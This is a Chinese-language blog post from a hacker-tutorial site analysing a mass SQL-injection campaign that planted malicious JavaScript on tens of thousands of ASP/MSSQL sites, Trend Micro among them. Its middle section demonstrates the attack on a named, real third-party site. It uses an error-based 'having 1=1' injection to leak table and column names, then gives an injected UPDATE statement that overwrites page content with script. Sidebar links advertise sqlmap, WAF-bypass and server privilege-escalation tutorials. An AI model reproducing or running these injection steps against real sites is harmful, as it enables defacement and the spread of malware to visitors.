关于趋势科技等网站被攻击的分析

所属分类: 网络安全 / 黑客教程 阅读数: 665
收藏 0 赞 0 分享
一. 首先在网上找到了这次攻击的新闻报道 http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通过GOOGLE搜索到了相关被黑的页面 http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅储&meta=&aq=f 趋势科技的页面被插入过http://www.2117966.net/f**kjp.js相关的JS挂马。
二. 直接查找这个JS相关的信息 http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。 通过分析发现被黑的页面都有如下特征: 1.被修改页面的网站都是ASP MSSQL的架构。 2.被修改的页面都存在SQL注入漏洞。
三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击: 1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名ShCoordinatorSurame。 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1–– 修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有SQL注入点的页面直接挂马。
四.总结. 这次大规模攻击的流程应该是自动化的: 1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。 2.针对漏洞攻击,进行自动化的SQL注入挂马。 现今虽然SQL注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
更多精彩内容其他人还在看

Sqlmap注入技巧集锦

sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充、分享。
收藏 0 赞 0 分享

SqlMap用户手册

sqlmap 是一个自动SQL 射入工具。文章内容有点长,但都是精华,读者们耐心的看吧,续篇的链接在文末。
收藏 0 赞 0 分享

sqlmap用户手册[续篇]

上一篇文章《sqlmap用户手册》其实只写了大部分可能用到的参数,还有些并未写,这次补上~
收藏 0 赞 0 分享

注入命令 手工注入命令大全

手工注入命令收集,大家可以学习下,早点摆脱工具,早有所成。
收藏 0 赞 0 分享

webshell 提权方法 服务器提权教程

提高入侵网站服务器的成功率,从事网络安全的朋友可以参考下,如果防范。
收藏 0 赞 0 分享

服务器 提权方法大全

大家是不是拿到了很多webshell.... 但 无法提权....
收藏 0 赞 0 分享

3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]

首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
收藏 0 赞 0 分享

CSRF的攻击方式详解 黑客必备知识

CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
收藏 0 赞 0 分享

抓取管理员hash值(哈希)的另类方法

哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
收藏 0 赞 0 分享

网站安全教程 绕过D盾进行注入的方法(图文教程)

D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
收藏 0 赞 0 分享
查看更多